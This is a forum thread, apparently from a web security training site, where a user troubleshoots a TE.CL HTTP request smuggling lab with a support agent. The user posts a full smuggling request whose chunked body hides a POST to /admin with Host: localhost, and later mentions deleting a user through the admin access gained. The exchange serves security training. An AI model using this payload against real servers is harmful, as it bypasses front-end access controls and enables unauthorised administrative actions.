Name is required.
Email address is required.
Invalid email address
Answer is required.
Exceeding max length of 5KB

Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

Evan Oct 17, 2019 08:25PM UTC

Lab doesn't seem to be working for me, even when I follow the solution. Getting timeout errors. This is what I'm trying to use, host url is correct, target is correct, update content length is not checkmarked, and keey getting time out error after 10000ms. Having similar issues in other labs of this category.

POST / HTTP/1.1
Host: ac451f7f1e1dd31780a427f50095008e.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0


Ben Wright Oct 18, 2019 01:35PM UTC Support Center agent

Hi,

I have just worked through this lab and was able to solve it using the instructions provided.

Have you added two carriage returns (pressing the Enter key twice) after the final 0 in the request that you have created in Burp Repeater? This is specified in the solution but some people do miss it.


Evan Oct 18, 2019 04:12PM UTC
Thank you Ben!

Turns out, I thought that admin panel access would be reflected on the admin webpage---turns out it wasn't. You just had to assume you had admin access/ since no errors were returned. I went ahead and ran the code to delete Carlos and it went through!

Ben Wright Oct 21, 2019 07:23AM UTC Support Center agent

Hi Evan,

I am glad that you were able to solve your issue.

Please let us know if you need any further assistance with anything in the future.


Post Your public answer

Your name
Your email address
Answer